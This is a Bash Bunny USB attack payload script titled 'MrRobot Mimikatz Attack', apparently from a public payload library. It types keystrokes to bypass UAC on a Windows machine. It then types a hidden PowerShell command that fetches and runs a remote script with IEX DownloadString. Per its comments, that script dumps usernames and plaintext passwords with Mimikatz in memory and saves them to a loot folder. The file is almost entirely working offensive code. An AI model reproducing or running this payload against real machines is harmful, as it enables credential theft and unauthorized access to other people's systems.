bashbunny-payloads/payloads/library/credentials/MrRobot/payload.txt

#!/bin/bash
#
# Title:         MrRobot Mimikatz Attack
# Author:        illwill, El3ct71k
# Version:       0.2
#
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
#
# Purple......................Setup
# Yellow single blink.........Running Powershell / Waiting for WebServer to start
# Yellow double blink.........Waiting for server connection and uploading results
# Cyan inverted single blink..Starts ethenet attack
# Cyan inverted double blink..Starts server to gets results
# Green..............Got Creds and copied to loot folder
# Red................No Creds
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot

# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500

LED STAGE2 
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk

iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py


#Wait for EOF in loot folder
LED SPECIAL2
while [ ! -e  "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
sleep 1

# check for empty lootddd directory, then check results and move them to loot
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
    if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
       LED FAIL
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
    else
       mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
       rm -rf $SWITCHDIR/loot/
       LED FINISH
    fi
else
     rm -rf $SWITCHDIR/loot/
     LED FAIL
fi